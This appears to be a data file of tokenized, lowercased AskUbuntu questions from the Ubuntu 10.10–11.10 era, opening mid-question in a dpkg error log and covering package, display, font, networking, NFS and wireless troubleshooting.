unconfigured dpkg : dependency problems prevent configuration of compiz : compiz depends on compiz-gnome | compiz-kde ; however : package compiz-gnome is not configured yet . package compiz-kde is not installed . compiz depends on compiz-plugins-main ( > = 0.9 ) ; however : package compiz-plugins-main is not configured yet . dpkg : error processing compiz ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evince : evince dependno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already s on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing evince ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing rhythmbox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-cdrecorder : rhythmbox-plugin-cdrecorder depends on rhythmbox ( = 0.13.3-0ubuntu6 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-cdrecorder ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugins : rhythmbox-plugins depends on rhythmbox ( = 0.13.3-0ubuntu6 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity : unity depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . unity depends on compiz ; however : package compiz is not configured yet . unity depends on compiz-plugins-main ; however : package compiz-plugins-main is not configured yet . dpkg : error processing unity ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of compiz-fusion-plugins-main : compiz-fusion-plugins-main depends on compiz-plugins-main ; however : package compiz-plugins-main is not configured yet . dpkg : error processing compiz-fusion-plugins-main ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gconf2 compiz-gnome compiz-plugins-main compiz evince rhythmbox rhythmbox-plugin-cdrecorder rhythmbox-plugins unity compiz-fusion-plugins-main e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : i tried re-installing gnome-panel-data as suggested by lekensteyn but the error is still there , probably the file is not the culprit what is going on here ?
55397	is the command line structure the same for linux and ubuntu ?	i 'm new to the linux world . i 'm curious to know if the command line syntax is the same between linux and ubuntu ?
55398	11.04 boot takes over 4 minutes	i did a fresh install of xubuntu 11.04 on a clean disk . cpu athlon 64 x2 3600+ , 1 gib of ram . the machine is about 5 years old and works like a charm normally . buuut : the normal boot takes about 4 minutes with xu 11.04 , including a 3 minute pause time where the machine does nothing ( see bootchart 1 , kern.log ( see lines around 742 ) . if i add `` noapic nolapic acpi=off '' the boot time is reduced a lot , but there 's still a pause of approximately half a minute ( see second bootchart image in above link ) . i also tried disabling legacy usb support in bios ( did n't change anything ) . especially since there 's still a lot of pause in the second boot i 'm wondering if there 's anything else to help it . secondly the first bootchart is making me wonder how the times in there are given . it states the boot process finished after less than a minute which obviously is wrong if you look in the kern.log . is there something that makes the system like completely frozen in that period of time where it does nothing so bootchart ca n't even account the time ? regards , chris
55399	after overriding some fonts , document viewer and others are not showing some texts	after copying the fonts from my windows xp system to the /usr/share/fonts/truetype/ folder , the document viewer ( version 2.23.0 ) is no more showing some texts ( as the summary of my pdf ) . the same happens with okular ( version 4:4.5.5-0ubuntu2 ) , epdfviewer ( version 0.1.7-4 ) and kpdf ( 3.5.10 ) . however , i could read my pdfs using xpdf ( version 3.02-9 ) and adobe reader 9 . any idea what went wrong with document viewer ? i tried reinstalling it , but had no difference . -- update : $ sudo fc-cache -v /usr/share/fonts : skipping , existing cache is valid : 0 fonts , 3 dirs /usr/share/fonts/x11 : skipping , existing cache is valid : 0 fonts , 6 dirs /usr/share/fonts/x11/100dpi : skipping , existing cache is valid : 0 fonts , 0 dirs /usr/share/fonts/x11/75dpi : skipping , existing cache is valid : 0 fonts , 0 dirs /usr/share/fonts/x11/type1 : skipping , existing cache is valid : 44 fonts , 0 dirs /usr/share/fonts/x11/encodings : skipping , existing cache is valid : 0 fonts , 1 dirs /usr/share/fonts/x11/encodings/large : skipping , existing cache is valid : 0 fonts , 0 dirs /usr/share/fonts/x11/misc : skipping , existing cache is valid : 0 fonts , 0 dirs /usr/share/fonts/x11/util : skipping , existing cache is valid : 0 fonts , 0 dirs /usr/share/fonts/truetype : skipping , existing cache is valid : 272 fonts , 20 dirs /usr/share/fonts/truetype/freefont : skipping , existing cache is valid : 12 fonts , 0 dirs /usr/share/fonts/truetype/msttcorefonts : skipping , existing cache is valid : 60 fonts , 0 dirs /usr/share/fonts/truetype/openoffice : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/takao : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/thai : skipping , existing cache is valid : 54 fonts , 0 dirs /usr/share/fonts/truetype/ttf-dejavu : skipping , existing cache is valid : 21 fonts , 0 dirs /usr/share/fonts/truetype/ttf-droid : skipping , existing cache is valid : 9 fonts , 0 dirs /usr/share/fonts/truetype/ttf-indic-fonts-core : skipping , existing cache is valid : 17 fonts , 0 dirs /usr/share/fonts/truetype/ttf-kacst-one : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/ttf-khmeros-core : skipping , existing cache is valid : 2 fonts , 0 dirs /usr/share/fonts/truetype/ttf-lao : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/ttf-liberation : skipping , existing cache is valid : 12 fonts , 0 dirs /usr/share/fonts/truetype/ttf-punjabi-fonts : skipping , existing cache is valid : 2 fonts , 0 dirs /usr/share/fonts/truetype/ttf-symbol-replacement : skipping , existing cache is valid : 0 fonts , 1 dirs /usr/share/fonts/truetype/ttf-symbol-replacement/symbol-replacement.ttf : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/ttf-ubuntu-title : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/share/fonts/truetype/ttf-xfree86-nonfree : skipping , existing cache is valid : 12 fonts , 0 dirs /usr/share/fonts/truetype/ubuntu-font-family : skipping , existing cache is valid : 4 fonts , 0 dirs /usr/share/fonts/truetype/umefont : skipping , existing cache is valid : 18 fonts , 0 dirs /usr/share/fonts/truetype/unfonts : skipping , existing cache is valid : 4 fonts , 0 dirs /usr/share/fonts/truetype/wqy : skipping , existing cache is valid : 2 fonts , 0 dirs /usr/share/fonts/type1 : skipping , existing cache is valid : 0 fonts , 2 dirs /usr/share/fonts/type1/gsfonts : skipping , existing cache is valid : 35 fonts , 0 dirs /usr/share/fonts/type1/mathml : skipping , existing cache is valid : 1 fonts , 0 dirs /usr/x11r6/lib/x11/fonts : skipping , no such directory /usr/local/share/fonts : skipping , existing cache is valid : 0 fonts , 0 dirs /home/tombrito/.fonts : skipping , existing cache is valid : 0 fonts , 0 dirs /var/cache/fontconfig : cleaning cache directory /home/tombrito/.fontconfig : cleaning cache directory fc-cache : succeeded -- update : screenshots the summary : comparison , document viewer on the left , and adobe reader on the right :
55408	in unity , how do i make desktop shortcuts ( a la windows , osx ) ?	so , i 'm using ubuntu for the first time , and i like it in general . i 've got this problem with the launcher , though : i ca n't drag and drop anything on to the desktop , only make shortcuts and folders from a menu . if i drag and drop a file into the desktop folder from the file system , i can then see it on the desktop . i 've seen other people discussing this , so i guess it 's a known issue -- and responses range from `` here 's a workaround '' to `` just use gnome '' . i guess what i 'm trying to figure out is how the team could decide to make unity the default ui on a distro made for simplicity and ease of use when it 's still missing such an incredibly basic feature . am i just missing something here ? is there an easy way to make this happen ? if not , does anyone know ... well ... why ?
55409	`` could not determine the upgrade '' while trying to update from 10.10 to 11.04	the error message i get on trying to upgrade is could not determine the upgrade an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . following the advice in another forum posting i have already tried sudo apt-get remove xserver-xorg-video-nouveau but this has not helped . what now ? should i report a bug ?
55413	how do i assign multiple users on a single machine distinct access rights on the same cifs-share ?	on a nas ( synology ) i created two groups , parents and children . the parents group has the users father and mother , in the group children i added a user son1 . furthermore i created the shared directories financial , photo , and public . i 'd like to know how i can access as father all three shared folders with readwrite rights from my ubuntu laptop . this very same laptop also holds an account for son1 ; his access rights should be noaccess , readonly , readwrite for the shared folders , respectively . i do n't understand how i should fill fstab with entries that have duplicate combinations of the first two fields ( e.g . //192.168.1.1/public /mnt/ds209/public ) that apply to different user accounts . any help is highly appreciated .
55415	how to execute applications with super-user privileges in gnome-do	i want to execute xampp control panel via gnome-do . but after i typed the sudopassword for authentication nothing happened . the laucher is located in /opt/lampp/share/xampp-control-panel and executes gksudo python /opt/lampp/share/xampp-control-panel/xampp-control-panel.py properly . how can i do that with gnome-do ?
55418	recording videos with audio in ubuntu	i 'm trying to put together a video blog for you tube , and i 'm looking for a software application where i can use the webcam to record video and also some way to record audio . i 've checked out wxcam and gmerlin , but that 's not quite what i 'm looking for .
55422	how to `` dock '' empathy to side of desktop ( digsby style )	i come from a windows background , and one of the coolest apps i used was digsby . it was a multi-protocol im client similar in function to empathy . now i like empathy , especially when used with gnome3 . one feature digsby had was the ability to dock it to one side of your desktop , when your mouse collided with that side the contact list would show . i am looking for the ability to do something similar , or , event better would be the ability to set it to show if i bounce my mouse to the top right corner . is there anything that would allow me to do this ?
55425	file not marked as executable	i 'm trying to install a game that has a two-cd installation , and i get this error message : the file '/media/freespace_1/setup.exe ' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit . since it 's on a cd , it is a read-only file and therefore i can not change the permissions . any ideas how to solve this ?
55432	no internet connection even if it reports auto ethernet connection established	my internet connection on my ubuntu laptop was just working yesterday . i do n't recalling doing anything drastic that could affect networking settings . however , i am now unable to connect to the internet and use firefox or ping to a website . when i right click the network icon on the top right , it says the connection was established with auto eth0 . what should i do to test what is happening ? ( t _ t ) thank you for your help~
55434	how to make dropdown menus have shadow ?	when i right-click on desktop , there 's no shadow of menu . how can i make all dropdown menus have shadow ?
55435	difference between rsyslogd and syslogd	i was trying to implement some changes to syslogd on ubuntu 10.04.02 lts ( server edition ) . i found /etc/syslog.conf is not present on system , instead i have /etc/rsyslogd.d/*.conf . syslogd can be installed by installing inetutils-syslogd , but i am unable to decide the pros and cons of both systems . also while installing inetutils-syslogd , i need to remove rsyslog and ubuntu-minimal . would some one explain merits and de-merits of rsyslogd over syslogd .
55441	install ubuntu on a ntfs partition	the ubuntu installer does not allow me to install on ntfs partitions , but certain circumstances requires me to do so . is it possible ?
55442	nvidia nouveau driver : no more 3d acceleration ?	after playing around with my drivers , my nouveau driver no longer seems to support 3d acceleration : compiz effects are gone , as are 3d gaming capabilities . nouveau is still doing something correctly in 2d ( e.g . the 1600x900 resolution is still correct , as compared to no nvidia driver at all , when it 's 1280x768 instead ) . how do i fix this without reinstall ubuntu for the billionth time ? xorg.conf 's that i 've tried : ( empty ) this ( which was the original ) : section `` device '' identifier `` default device '' driver `` nouveau '' endsection other things i 've tried : modprobe nouveau sudo apt-get purge xserver-xorg-video-nouveau -- remove sudo apt-get install xserver-xorg-video-nouveau -- reinstall uninstalling/reinstalling through additional drivers
55446	how do i create panes within a nautilus window ?	this morning my cat discovered a nautilus feature i was n't aware of . by sitting on my keyboard she split the nautilus window into two panes . i am now at the office without my cat and unable to repeat the procedure . is there a way to achieve this without a cat ?
55448	i installed a font and now it is used as the default font in web pages	i installed a font called segoewp.ttf and now in every browser its the font for each page unless the page has a pre embedded font . it does n't matter if the page has a stated font like : font : verdana ; or something like that , it is using segoewp and now ubuntu has this ridiculous way of storing fonts and now i ca n't find it to uninstall it .
55450	`` rsync '' from remote to local	let say that i have 2 machines : local ( centos ) remote on ip : 123.123.123.123 ssh port 456 ( ubuntu server ) and i want to synchronize my remote folder /home/wolfy/py with my local folder /home/cavo/python . can this be done with rsync ? can you give me an example ?
55451	how can i setup nomachines on my linux vps	we 'll , i basically just wan na connect to my linux vps via a gui and i'v done some research on the following and i think nomachines can get this done , however i'v installed the windows client of nomachines on my windows xp machine and tried to login but to vain . the stats of my server are : there is no gui ( like gnome ) installed on my ubuntu vps i can access my server via sftp but not via gui as my host says they do n't have a gui installed . my questions are : how can i install a gui to my server ? can i install a gui on my server via sftp ? can someone tell me the procedure to run nomachines ? if someone has a different service they 'd wan na recommend me to connect to my vps then feel free , i just wan na get the job done . this is precisely what i want to do : http : //www.youtube.com/watch ? v=mgfuoyemcjs & feature=related thank you .
55456	is it possible to grow a luks-encrypted external raid5 array ?	i 'm planing to buy an external raid array ( hardware raid5 ) . my intention is to outfit it with 4 disks initially and encrypt it using luks and dm-crypt . my question is : will i be able to hot swap disks and grow the encrypted raid adding one or two more disks to a total of 6 ? i see no reason why not , but better safe than sorry . so is dm-crypt stable against growing partition size ?
55459	after upgrade to 11.04 , my laptop randomly turns of the external display	i recently upgraded from maverick to natty and this problem has appeared after the upgrade - it never happened while i was on maverick . i 'll try to explain this as well as i can . on maverick when i plugged/unplugged the external display to my laptop i had to manually enable/disable the external display from the monitors dialog . by monitors dialog i mean this : but on natty , when i plug/unplug the monitor this is automatically detected and the display is enabled/disabled , without me needing to go that monitors dialog and do anything . i think that the os does some polling of the external display port to see if something is plugged . my problem is , when i have already plugged an external monitor and am using it , sometimes it becomes disabled by the os , as if i had went to the monitors dialog and disabled it manually , only i did n't do anything , i am watching a movie and i 'm not near the computer at all . i think that this autodetect feature disables it . it seems that it thinks that i have unplugged the cable , even though i have n't . i think that the vga cable does n't make good contact with the pins in the laptop 's vga port so it might be disconnecting for a fraction of the second , but this would n't be a problem if there was n't this autodetect feature .
55467	removed python from my install , how do i get it back ?	i just typed sudo apt-get remove python2.6 i did n't realized that this command will uninstall the whole packages from my computer . is it possible to uninstall the ubuntu without cd . or how can i fix this big mistake ?
55468	gnome-terminal does not differentiate between c-d and c-s-d	when i run cat on gnome-terminal , both c-d and c-s-d terminate it . this is because gnome-terminal can not distinguish between these keys and sends and eof in both the cases . is there a ways i can configure this and tell gnome-terminal to differentiate these keys . the reason i am asking for this is because i use tmux in gnome-terminal and i 'd like to bind tmux actions to c-s-z , c-s-d etc. , but doing so renders the non-shift variants of those keys to the same tmux bindings . in other words , i want c-s-d to do a tmux action that i bind , but c-d to send an eof . currently , both these key combinations do the same thing , whatever it may be . someone on irc freenode.net # tmux suggested that gnome-terminal might be sending the same key codes for both these key combinations and so tmux is unable to distinguish between them . i also learnt that xterm and rxvt can be configured to do this , but i 'd like to know if gnome-terminal can do it . any ideas ont hsi appreciated : )
55478	how can i install add-apt-repository	when i want to use a package from launchpad it tells me to execute the command : sudo add-apt-repository ppa : user/ppa-name however , on my freshly installed natty server box , this command does not exist . ( sudo : add-apt-repository : command not found ) how can i install add-apt-repository ?
55480	trac setup error	i 'm trying to setup the trac , this is the commands that i used : sudo apt-get install trac python-setuptools libapache2-mod-python enscript sudo mkdir /var/www/trac sudo trac-admin /var/www/trac/repos initenv but i 'm getting the following error : file `` /usr/local/bin/trac-admin '' , line 5 , in < module > from pkg_resources import load_entry_point file `` /usr/lib/python2.6/dist-packages/pkg_resources.py '' , line 2659 , in < module > parse_requirements ( __requires__ ) , environment ( ) file `` /usr/lib/python2.6/dist-packages/pkg_resources.py '' , line 546 , in resolve raise distributionnotfound ( req ) pkg_resources.distributionnotfound : trac==0.12.2
55481	external screens with matrox dualhead2go working in linux ?	i would like to know if a dualhead2go would work in linux , to have two external screens attached to it and to the vga/dvi of my laptop : http : //www.matrox.com/graphics/en/products/gxm/dh2go/ the model number below : 18ea:0004 matrox graphics according to the other ids i found on http : //www.linux-usb.org/usb.ids , my model is probably a dualhead2go digital edition : 18ea matrox graphics , inc. 0002 dualhead2go [ analog edition ] 0004 triplehead2go [ digital edition ] extended print out of lsusb : bus 002 device 004 : id 18ea:0003 matrox graphics , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 1.01 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x18ea matrox graphics , inc. idproduct 0x0003 bcddevice 1.00 imanufacturer 1 iproduct 2 iserial 4 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 41 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.01 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 34 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1
55483	the network setting in virtualbox ose ( ubuntu server on ubuntu )	ubuntu server ( natty ) is running on my ubuntu ( natty ) by virtualbox ose , how to only i can access my server not every internal ip in my lan and both can access the internet . now i sharing the internet by bridge , it 's good for access my virtual server . but everyone on my lan can see too .
55488	install/upgrade to apache ant 1.8.2	how to install/upgrade apache ant 1.8.2 with apt-get on ubuntu natty . i tried sudo apt-get upgrade ant and sudo apt-get install ant ( after removing the already installed version ie.,1.8.1 ) but nothing works . every time it installs ant 1.8.1 only .
55489	how to download a package for offline installation ?	sudo apt-get install { x } ex : x = ghdl i want download the package `` x '' to my usb . how can i do that ? second , my computer does n't have internet , so how do i install it on my computer ? edit : so my question is this : how to download the packages from the ubuntu desktop having the internet connection without installing it there ? how do i copy the now downloaded package on to my usb drive ? ( specific location of the downloaded package once it 's downloaded ) what command am i supposed to execute at home to install the software from the usb once i am on the computer that does n't have the internet connection ?
55494	how do i add a syntax highlighter format to gedit ?	how can i add in the regular expressions for an additional syntax language ?
55501	command line : create file with new filename if the filename already exists	i was wondering if it was possible have a command that creates one file , but every time the command is executed , it would n't overwrite the file created in the previous execution . for example : touch test1.txt would create 1 file called test1.txt . but the next time i execute it , i would like the new file to be called test2.txt , or something like that . so without overwriting the already existing file . in a way it could be executed multiple times without problems . do n't misunderstand me , i 'm not trying to create multiple files with one command . thanks in advance !
55502	completely uninstallation lamp	i just install lamp by using a command line . sudo apt-get install lamp-server^ it 's work ! then i needed to uninstall them so i tried to sudo apt-get remove lamp-server^ by the way , it 's show me to messages below ... . the following extra packages will be installed : libsdl1.2debian-alsa the following packages will be removed : apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common bluez-cups cups cups-driver-gutenprint cups-pdf foo2zjs gdm gdm-guest-session gecko-mediaplayer gnome-applets gnome-control-center gnome-media gnome-mplayer gnome-panel gnome-session gnome-settings-daemon goldendict gstreamer0.10-pulseaudio hpijs hplip hplip-cups indicator-applet indicator-applet-appmenu indicator-applet-complete indicator-sound libapache2-mod-php5 libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap libasound2-plugins libcanberra-pulse libdbd-mysql-perl libdbi-perl libhpmud0 libhtml-template-perl libmysqlclient16 libnet-daemon-perl libphonon4 libplrpc-perl libpulse-browse0 libpulse-mainloop-glib0 libpulse0 libqtwebkit4 libsane-hpaio libsdl1.2debian-pulseaudio libsnmp15 libwrap0 mplayer mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 phonon phonon-backend-gstreamer php5-cli php5-common php5-mysql pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-module-zeroconf pulseaudio-utils pxljr python-speechd speech-dispatcher splix ssl-cert tcpd vlc-plugin-pulse what 's going on ? i have to remove pulseaudio , mplayer and gdm ? is it concerned with lamp ? next , i try to using a command line sudo apt-get -- purge remove apache2 these result yield ... the following packages will be removed : apache2* is it safe for do like this ? i intend to completely uninstall lamp .
55503	unable to connect to wireless network with an underscore in the ssid	i am unable to connect to a wireless access point when the ssid contains an underscore in the name from my ubuntu 11.04 laptop . not sure whether it is permissible to have underscores in an wireless ssid , however my windows laptop connects okay . it 's a public access point , so unfortunately i ca n't change the ssid . i have replicated the issue on my home wireless access point . not sure whether this has anything to do with the issue , but when i run iwlist wlan0 scan there are a number of results with essid : '' \x00 '' . i 'm going to see whether i can get the mac address of the router to see which one is a match . the output from lspci | grep -i network 02:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) any suggestions ( aside from renaming the ssid ) most welcome !
55504	closing the terminal where `` compiz -- replace '' is run , causes compiz to crash again	so every once in a while compiz will crash , sometimes randomly , more often when i 'm messing with the compiz settings . i can restart compiz with compiz -- replace , and it fixes the window decoration , etc. , but that command never finishes in the terminal . if i close the terminal or ctrl-c , it causes compiz to crash all over . so the only thing i can do is just leave that terminal running ( not a great solution ) .
55509	upgrading php version from 5.3.3 to 5.3.6	i 'm trying to upgrade the version of php installed on an ubuntu server 10.10 from 5.3.3 to 5.3.6 i followed the instructions from here and all seemed to go well , but when i run phpinfo ( ) it 's still showing the old version . if i run php -- version from the command line it says 5.3.6 . what do i need to do to get apache to use this version ?
55511	how do i decide which manpage to use on the ubuntu manuals site ?	i 've found the ubuntu manuals site ( http : //manpages.ubuntu.com ) very useful for looking up manpages when i 'm not at a computer with ubuntu on it . however , i 've found that sometimes the search results table links to multiple manpages with the same name . for example , performing this search for grep results in two links for each distribution , both labeled grep ( 1 ) : one to grep.1posix.html and one to grep.1.html . i 've heard of ubuntu being `` posix-compliant '' , so how do i know which manpage will be most applicable to a typical ubuntu install ? ( or , how do i know which manpage shows up when i use the man command ? )
55515	why only home directory ?	i want to save my ubuntu-one folder in my secondary hd , just like my dropbox folder . i know that saving data in a secondary disk is `` the old way '' , but i bring this habit from my kid days using windows . is it going to be always this way , or will i be able to share other folders outside /home in the future ? ?
55517	how to capture a hdmi device on ubuntu/kubuntu ?	i have a fujifilm s2800hd , that can record hd films , the camera has mini-hdmi output to conect to tv , but i want to know if that is possible to capture what the camera is showing on its own lcd . i know that vlc player has a feature to capture external devices , but seems that hdmi is not present . is there a way to capture what the camera is recording real-time ? i buy this camera not just to take photos , but to record screencasts for a e-learning business .
55519	how do i turn off wlan automatically when lan is connected ?	i use my thinkpad laptop with a docking station . the docking station is connected to my router via lan . when i walk around the house i use my laptop with wlan . is it possible ( and how ) to manage these devices with a script or something to work like this : if a lan-connection is up , the os should turn off wifi and if lan-connection gets lost ( undocking ) wifi should turn on automatically . i use ubuntu 11.04 64bit with gnome 2 . the system works on an lenovo thinkpad r500 with . wlan-device : intel corporation pro/wireless 5100 agn [ shiloh ] lan-device : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) any help would be appreciated . thanks .
55520	gnome-panel missing	i am using ubuntu 11.10 . i removed the new mac look to make ubuntu look like classic ubuntu of previous versions . after that only desktop is there . rest everything is missing including panels . but from login menu in gdm i can choose classic ubuntu and login to get all details . otherwise in normal ubuntu login it is not possible . how can i get back that panel . even alt+f2 not working
55522	how to avoid opening duplicate files in new windows in gedit ?	having already opened several text files with each in one tab in a window , now open another text file , gedit sometimes creates another window instead of a session under the current window . i wonder if it is possible to control whether to open the next file under the current window , or in a new one ? if the text file has already been opened , gedit sometimes open it again in another window , and ask me if i want to edit or not . i was wondering how to make gedit not to open a file already opened ? thanks !
55527	dual boot and sleep/hibernate issues ?	i set up a dual boot before , but i 've never thought about how or if putting a laptop to sleep or hibernate will affect grub or the oses . for example , if i dual boot windows 7 and ubuntu , then use windows and put it to either sleep or hibernate , will something go horribly wrong if i select ubuntu at the grub menu ?
55528	newbie questions for ubuntu server setup ?	i am new to ubuntu . i am testing it using virtual machine . i have installed 2 ubuntu 10.04 , and i want to make 1 act as server and the other as a client . my questions : how do i add an additional file system and make sure it mount at the boot time . lets say i want to make it on /newcontent directory ? ( what are the commands ? ) how to edit the /etc/exports file , then export /newcontent , /newmovies and /backup to my nfs client ( use any nfs options ) . lastly , how do i test the mounting of the file system on my client side ? if i could test it successfully : i want to mount the file systems on client using auto mounter . how to create a new autofs map ( lets call it auto.mydocuments ) with a mount point of /mydocuments ? and the auto.mydocuments map should mount all directories exported the nfs server i.e . newcontent , newmovies and back as descendants of /mydocuments . thanks = )
55532	how can i change the alt+middle-mouse-button resize to alt+right-mouse-button ?	i love how you can resize windows by pressing alt+middle-mouse-button and drag . though now i got a mouse which does n't support pressing the middle mouse button.. how do i do to change the combination from alt+middle-mouse-button to alt+right-mouse-button ? ( on ubuntu 11.04 with unity )
55538	need to manually enable wireless networking on a centrino n 6200	when i run ubuntu automatic connected to wireless network but can not connect to internet till i do disable then enable networking , please i need solution for this issue , help . i get this output when i run lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 network controller : intel corporation centrino advanced-n 6200 ( rev 35 ) 03:00.0 sd host controller : ricoh co ltd mmc/sd host controller 03:00.1 system peripheral : ricoh co ltd memory stick host controller 03:00.3 firewire ( ieee 1394 ) : ricoh co ltd firewire host controller 03:00.4 sd host controller : ricoh co ltd mmc/sd host controller 04:00.0 ethernet controller : atheros communications ar8131 gigabit ethernet ( rev c0 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) i get this output when i run lsusb bus 002 device 003 : id 045e:00e1 microsoft corp. wireless laser mouse 6000 reciever bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0489 : e00f foxconn / hon hai bus 001 device 004 : id 05ca:18b7 ricoh co. , ltd bus 001 device 003 : id 147e:1001 upek bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i get this output when i run sudo lshw -class network *-network description : wireless interface product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 35 serial : 00:23:14 : ea:2e:98 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-10-generic firmware=9.221.4.1 build 25532 ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : dd100000-dd101fff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 00:24 : be : ea:64:04 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : db100000-db13ffff ioport:4000 ( size=128 ) i get this output when i run rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no
